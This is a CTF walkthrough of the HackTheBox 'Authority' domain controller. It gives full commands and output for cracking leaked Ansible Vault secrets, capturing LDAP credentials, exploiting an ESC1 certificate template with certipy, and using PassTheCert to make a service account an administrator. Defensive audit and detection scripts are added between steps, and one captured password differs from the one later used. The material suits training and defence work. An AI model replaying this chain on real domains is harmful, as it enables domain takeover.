Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-06 20:05 IST
Nmap scan report for 10.10.11.222
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-06 18:35:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2024-02-06T18:38:28+00:00; +3h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-02-06T18:38:26+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
8443/tcp open ssl/https-alt
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Tue, 06 Feb 2024 18:35:55 GMT
| Connection: close
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Tue, 06 Feb 2024 18:35:55 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Tue, 06 Feb 2024 18:36:02 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2024-02-04T18:33:56
|_Not valid after: 2026-02-06T06:12:20
|_ssl-date: TLS randomness does not represent time
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49735/tcp open msrpc Microsoft Windows RPC
54336/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=2/6%Time=65C243CB%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;ch
SF:arset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x2006\x20Feb
SF:\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<h
SF:tml><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL='/pwm'\"/>
SF:</head></html>")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GE
SF:T,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Tue
SF:,\x2006\x20Feb\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r
SF:\n")%r(FourOhFourRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20t
SF:ext/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x
SF:2006\x20Feb\x202024\x2018:35:55\x20GMT\r\nConnection:\x20close\r\n\r\n\
SF:n\n\n\n\n<html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL
SF:='/pwm'\"/></head></html>")%r(RTSPRequest,82C,"HTTP/1\.1\x20400\x20\r\n
SF:Content-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\n
SF:Content-Length:\x201936\r\nDate:\x20Tue,\x2006\x20Feb\x202024\x2018:36:
SF:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20lan
SF:g=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,A
SF:rial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-
SF:color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x
SF:20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:blac
SF:k;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</st
SF:yle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Re
SF:quest</h1><hr\x20class=\"line\"\x20/><p><b>Type</b>\x20Exception\x20Rep
SF:ort</p><p><b>Message</b>\x20Invalid\x20character\x20found\x20in\x20the\
SF:x20HTTP\x20protocol\x20\[RTSP/1\.00x0d0x0a0x0d0x0a\.\.\.\]</p><p><b
SF:>Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pro
SF:cess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perce
SF:ived\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20r
SF:equest\x20syntax,\x20invalid\x20");
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2024-02-06T18:38:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.18 seconds
➜ Authority smbclient -L ////10.10.11.222//
Password for [WORKGROUP\nakul]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
➜ Authority smbclient -N //10.10.11.222/Development
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 17 18:50:38 2023
.. D 0 Fri Mar 17 18:50:38 2023
Automation D 0 Fri Mar 17 18:50:40 2023
5888511 blocks of size 4096. 1494600 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
➜ Authority ldapsearch -H ldap://10.10.11.222 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=authority,DC=htb
namingcontexts: CN=Configuration,DC=authority,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=authority,DC=htb
namingcontexts: DC=DomainDnsZones,DC=authority,DC=htb
namingcontexts: DC=ForestDnsZones,DC=authority,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
➜ Authority ldapsearch -H ldap://10.10.11.222 -x -b "DC=authority,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=authority,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
In the Development share, under /Automation/Ansible/PWM/defaults:
➜ defaults cat main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764%
I'll crack these hashes with ansible2john.
➜ hash cat ldap_admin_password pwm_admin_login pwm_admin_password
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438
$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531
cat ldap_admin_password pwm_admin_login pwm_admin_password > john
john john --wordlist=/usr/share/wordlists/rockyou.txt
➜ hash john john --show
ldap_admin_password:!@#$%^&*
pwm_admin_login:!@#$%^&*
pwm_admin_password:!@#$%^&*
3 password hashes cracked, 0 left
➜ hash cat ldap_admin_password|ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123%
➜ hash cat pwm_admin_login|ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm%
➜ hash cat pwm_admin_password|ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23%
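The three values above were recoverable because the vault file sat on a share readable without credentials and the vault password was in rockyou. As an added audit helper (not code from the page's author or from Ansible), the script below does two things a reviewer of such a share would want: it finds every `!vault |` value in a YAML file, and it parses the documented vault envelope so the reviewer can see why a leaked blob is an offline-crackable secret. The sample YAML is constructed from the page's main.yml with the pwm_admin_login blob kept; the envelope layout (hex body decoding to salt, HMAC-SHA256 and AES-CTR ciphertext separated by newlines) is the published Ansible Vault 1.1 format.

```python
"""Find Ansible Vault blobs in YAML text and parse their envelope (audit helper)."""
import re

# Header forms: $ANSIBLE_VAULT;1.1;AES256  or  $ANSIBLE_VAULT;1.2;AES256;<vault-id>
HEADER = re.compile(r"^\$ANSIBLE_VAULT;(?P<version>[\d.]+);(?P<cipher>[A-Z0-9]+)(?:;(?P<vault_id>\S+))?$")
HEX_LINE = re.compile(r"^[0-9a-fA-F]+$")
KEY_LINE = re.compile(r"^\s*(?P<key>[^:\s]+)\s*:\s*!vault\s*\|")


def find_vault_blobs(yaml_text):
    """Return {key: blob_text} for every `key: !vault |` value in the YAML.

    Continuation lines are the $ANSIBLE_VAULT header and hex-only lines, so
    indentation is not relied on (the copy on the page had lost it).
    """
    blobs, key, lines = {}, None, []
    for line in yaml_text.splitlines():
        stripped = line.strip()
        m = KEY_LINE.match(line)
        if m:
            if key:
                blobs[key] = "\n".join(lines)
            key, lines = m.group("key"), []
            continue
        if key and (stripped.startswith("$ANSIBLE_VAULT") or HEX_LINE.match(stripped)):
            lines.append(stripped)
        elif key:
            blobs[key] = "\n".join(lines)
            key, lines = None, []
    if key:
        blobs[key] = "\n".join(lines)
    return blobs


def parse_vault_envelope(blob):
    """Split a vault blob into header fields, salt, HMAC and ciphertext.

    The hex body decodes to three newline-separated hex strings: the PBKDF2
    salt (32 bytes), an HMAC-SHA256 over the ciphertext (32 bytes) and the
    AES-256-CTR ciphertext. Salt and HMAC travel with the blob, which is what
    lets anyone holding the file test candidate vault passwords offline.
    """
    header, *body = blob.strip().splitlines()
    m = HEADER.match(header.strip())
    if not m:
        raise ValueError("not an Ansible Vault blob")
    inner = bytes.fromhex("".join(line.strip() for line in body)).decode("ascii")
    salt_hex, hmac_hex, ct_hex = inner.split("\n")
    return {
        "version": m.group("version"),
        "cipher": m.group("cipher"),
        "vault_id": m.group("vault_id"),
        "salt": bytes.fromhex(salt_hex),
        "hmac": bytes.fromhex(hmac_hex),
        "ciphertext": bytes.fromhex(ct_hex),
    }


def audit(yaml_text):
    """Map each vault key to (version, cipher, salt_len, hmac_len, ciphertext_len)."""
    report = {}
    for key, blob in find_vault_blobs(yaml_text).items():
        env = parse_vault_envelope(blob)
        report[key] = (env["version"], env["cipher"],
                       len(env["salt"]), len(env["hmac"]), len(env["ciphertext"]))
    return report


# Constructed sample: the page's main.yml reduced to one vault value.
SAMPLE_YAML = """---
pwm_hostname: authority.htb.corp
pwm_admin_login: !vault |
  $ANSIBLE_VAULT;1.1;AES256
  32666534386435366537653136663731633138616264323230383566333966346662313161326239
  6134353663663462373265633832356663356239383039640a346431373431666433343434366139
  35653634376333666234613466396534343030656165396464323564373334616262613439343033
  6334326263326364380a653034313733326639323433626130343834663538326439636232306531
  3438
ldap_uri: ldap://127.0.0.1/
"""

if __name__ == "__main__":
    for key, row in audit(SAMPLE_YAML).items():
        print(key, row)
```

A 16-byte ciphertext for a username-sized value is expected: AES-CTR does not pad, but Ansible pads the plaintext to the block size before encrypting, so short secrets still show their rough length. The practical takeaway is that a vault file is only as strong as the vault password, and a vault file on an anonymously readable share should be treated as disclosed.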
I'll try these creds on HTTP.
I'll add my IP as the LDAP URL and listen for the incoming connection using ncat.
Click on Test LDAP Profile and start the nc listener.
svc_ldap:htblDaP_1n_th3_cle4r!
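What the listener received is an LDAP simple bind: PWM opened a connection to the configured ldap:// URL and authenticated with its stored service credentials, so the password crossed the network unencrypted. As an added example (not code from the page or from PWM), the minimal BER parser below shows what a network sensor checks to flag that condition: a BindRequest whose authentication choice is simple, with a non-empty password, on a connection that is neither LDAPS nor upgraded with StartTLS. The sample PDU is constructed with the encoder in the same block; the DN and password in it are made up.

```python
"""Flag LDAP simple binds that carry a cleartext password over a non-TLS connection."""


def _ber_len(n):
    """Encode a BER length (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _ber_int(value):
    size = (value.bit_length() + 8) // 8          # leaves room for the sign bit
    return _tlv(0x02, value.to_bytes(size, "big", signed=True))


def build_simple_bind(message_id, bind_dn, password):
    """Constructed sample: LDAPMessage { messageID, BindRequest { 3, dn, simple pw } }."""
    bind = _ber_int(3) + _tlv(0x04, bind_dn.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _ber_int(message_id) + _tlv(0x60, bind))


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER element starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(pdu):
    """Decode an LDAP BindRequest; return None for any other or malformed PDU."""
    try:
        tag, msg, _ = _read_tlv(pdu, 0)
        if tag != 0x30:
            return None
        tag, mid, pos = _read_tlv(msg, 0)
        op_tag, op, _ = _read_tlv(msg, pos)
        if tag != 0x02 or op_tag != 0x60:         # 0x60 = [APPLICATION 0] BindRequest
            return None
        _, version, pos = _read_tlv(op, 0)
        _, name, pos = _read_tlv(op, pos)
        auth_tag, cred, _ = _read_tlv(op, pos)
    except (IndexError, ValueError):
        return None
    simple = auth_tag == 0x80                     # [0] simple; 0xA3 would be [3] sasl
    return {
        "message_id": int.from_bytes(mid, "big", signed=True),
        "version": int.from_bytes(version, "big", signed=True),
        "bind_dn": name.decode("utf-8", errors="replace"),
        "auth": "simple" if simple else "sasl",
        "password_len": len(cred) if simple else 0,
    }


def flag_cleartext_bind(pdu, dst_port, tls_active):
    """Alert on a non-anonymous simple bind that is not protected by TLS."""
    info = parse_bind_request(pdu)
    if not info or info["auth"] != "simple" or info["password_len"] == 0:
        return None                               # anonymous or SASL bind: no password exposed
    if tls_active or dst_port == 636:
        return None                               # LDAPS or StartTLS already negotiated
    return {"alert": "cleartext LDAP simple bind", "bind_dn": info["bind_dn"],
            "dst_port": dst_port, "password_len": info["password_len"]}


if __name__ == "__main__":
    sample = build_simple_bind(1, "CN=svc_example,DC=example,DC=test", "Hunter2!")
    print(flag_cleartext_bind(sample, 389, False))
```

The same check is the reason the mitigation on the application side is an ldaps:// URL (or StartTLS) plus a service account with no more rights than the lookups need: the bind still happens, but the password no longer travels in a form a listener can read.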
I can get a shell on the box with these credentials using evil-winrm.
I'll use certipy to find misconfigured certificate templates.
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -target authority.htb -text -stdout -vulnerable
--SNIP--
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
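The ESC1 line above is the conjunction of four template properties: the requester may supply the subject (and so the SAN), the template carries an EKU that lets the certificate authenticate to AD, no manager approval or authorized signature gates issuance, and a principal any domain account can act through (here Domain Computers) holds Enroll. As an added audit example (not certipy's code), the function below evaluates those conditions on a template described as a dict, and a `harden` helper shows the two template-side fixes. The flag bits and EKU OIDs are the published AD CS values; the CorpVPN dict is constructed to mirror what the page's output states, and its EKU list and the LOW_PRIV_PRINCIPALS set are assumptions marked in the code.

```python
"""Evaluate a certificate template for the ESC1 conditions (audit helper)."""

# msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits (AD CS documented values)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002            # "CA certificate manager approval"

# EKUs that let the issued certificate authenticate a principal to AD
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",          # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",     # Smart Card Logon
    "1.3.6.1.5.2.3.4",            # PKINIT Client Authentication
    "2.5.29.37.0",                # Any Purpose
}

# Assumption: principals that any domain account can enrol through.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_findings(template):
    """Return the reasons a template meets ESC1; an empty list means it does not."""
    if not template.get("enabled", True):
        return []
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []                                 # CA builds the subject from AD: requester cannot pick a SAN
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if ekus and not ekus & CLIENT_AUTH_EKUS:
        return []                                 # no authentication EKU (empty EKU list means any purpose)
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []                                 # manager approval stops automatic issuance
    if template.get("msPKI-RA-Signature", 0) > 0:
        return []                                 # an authorized signature is required
    enrollers = set(template["enrollment_principals"]) & LOW_PRIV_PRINCIPALS
    if not enrollers:
        return []                                 # only privileged principals can enrol
    return [
        "enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)",
        "authentication EKU: " + (", ".join(sorted(ekus & CLIENT_AUTH_EKUS)) or "any purpose"),
        "no manager approval and no authorized signatures",
        "low-privileged enrollment by: " + ", ".join(sorted(enrollers)),
    ]


def harden(template):
    """Template-side fixes: let the CA build the subject and require manager approval."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed


# Constructed to mirror the page's CorpVPN finding; the EKU list is an assumption.
CORPVPN_AS_FOUND = {
    "name": "CorpVPN",
    "enabled": True,
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_principals": ["Domain Computers", "Domain Admins", "Enterprise Admins"],
}

if __name__ == "__main__":
    for reason in esc1_findings(CORPVPN_AS_FOUND):
        print("ESC1:", reason)
    print("after hardening:", esc1_findings(harden(CORPVPN_AS_FOUND)))
```

Either fix alone closes ESC1 on the template, and so does removing Enroll from Domain Computers; which one is right depends on why the template exists. Note that the next step on the page also depends on something the template does not control: the ability of an ordinary account to create a machine account, which is governed by the domain's ms-DS-MachineAccountQuota.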
I can add domain computers, so I'll add one using impacket-addcomputer.
impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -method LDAPS -computer-name hello -computer-pass 'Password123!' -dc-ip 10.10.11.222
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Successfully added machine account hello$ with password Password123!.
Now I'll use certipy to create a certificate.
certipy-ad req -username 'hello$' -password 'Password123!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -dns authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with multiple identifications
UPN: 'administrator@authority.htb'
DNS Host Name: 'authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'
➜ hash certipy-ad auth -pfx administrator_authority.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@authority.htb'
[1] DNS Host Name: 'authority.htb'
> 0
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
KDC_ERR_PADATA_TYPE_NOSUPP means the KDC does not accept the PKINIT pre-authentication type, so the certificate cannot be exchanged for a TGT; it can still be used to authenticate to LDAPS via Schannel, which is what PassTheCert does:
https://github.com/AlmondOffSec/PassTheCert
For the PassTheCert attack I need the key and the certificate in separate files.
➜ hash certipy-ad cert -pfx administrator_authority.pfx -nocert -out administrator.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'administrator.key'
➜ hash certipy-ad cert -pfx administrator_authority.pfx -nokey -out administrator.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'administrator.crt'
➜ hash python PassTheCert/Python/passthecert.py -action ldap-shell -crt administrator.crt -key administrator.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# help
add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
add_user new_user [parent] - Creates a new user.
add_user_to_group user group - Adds a user to a group.
change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
clear_rbcd target - Clear the resource based constrained delegation configuration information.
disable_account user - Disable the user's account.
enable_account user - Enable the user's account.
dump - Dumps the domain.
search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
get_user_groups user - Retrieves all groups this user is a member of.
get_group_users group - Retrieves all members of a group.
get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
exit - Terminates this session.
add_user_to_group looks juicy.
add_user_to_group svc_ldap administrators
Adding user: svc_ldap to group Administrators result: OK
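On the domain controller, that membership change is recorded in the Security log as event 4732 (a member was added to a security-enabled local group; 4728 and 4756 are the global and universal group equivalents), whoever performed it and however they authenticated. As an added detection example (not code from the page), the function below runs over a list of such events and alerts on additions to Tier 0 groups. The events are constructed dicts carrying the standard field names of those events, and PRIVILEGED_GROUPS is an assumption about which groups this domain treats as privileged.

```python
"""Alert on additions to privileged groups in Windows security events (detection helper)."""

GROUP_ADD_EVENT_IDS = {4728, 4732, 4756}           # member added to global / local / universal group

# Assumption: the groups this domain treats as Tier 0.
PRIVILEGED_GROUPS = {
    "Administrators", "Domain Admins", "Enterprise Admins", "Schema Admins",
    "Account Operators", "Backup Operators",
}


def privileged_group_additions(events):
    """Return one alert per group-add event whose target group is privileged."""
    alerts = []
    for event in events:
        if event.get("EventID") not in GROUP_ADD_EVENT_IDS:
            continue
        group = event.get("TargetUserName", "")      # for these events the "target user" is the group
        if group not in PRIVILEGED_GROUPS:
            continue
        alerts.append({
            "time": event.get("TimeCreated", ""),
            "event_id": event["EventID"],
            "group": group,
            "member": event.get("MemberName", ""),   # DN of the account that was added
            "actor": event.get("SubjectUserName", ""),
            "computer": event.get("Computer", ""),
        })
    return alerts


# Constructed sample events: two group additions, one of them to Administrators.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-02-06T19:02:11Z", "EventID": 4732, "Computer": "dc01.example.test",
     "SubjectUserName": "Administrator", "TargetUserName": "Administrators",
     "MemberName": "CN=svc_ldap,CN=Users,DC=example,DC=test"},
    {"TimeCreated": "2024-02-06T19:05:40Z", "EventID": 4732, "Computer": "dc01.example.test",
     "SubjectUserName": "helpdesk", "TargetUserName": "Remote Desktop Users",
     "MemberName": "CN=jdoe,CN=Users,DC=example,DC=test"},
    {"TimeCreated": "2024-02-06T19:06:02Z", "EventID": 4624, "Computer": "dc01.example.test",
     "SubjectUserName": "-", "TargetUserName": "svc_ldap"},
]

if __name__ == "__main__":
    for alert in privileged_group_additions(SAMPLE_EVENTS):
        print(alert)
```

A change like this one is rare enough in most domains that alerting on every occurrence is reasonable; correlating the actor with the logon that preceded it (here a certificate-based LDAPS logon rather than an interactive Administrator session) is what separates the expected change from the suspicious one.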
I'll reconnect with evil-winrm as the svc_ldap user.
*Evil-WinRM* PS C:\users\administrator\Desktop> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/10/2022 8:29:31 PM
Password expires Never
Password changeable 8/11/2022 8:29:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 7:43:09 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
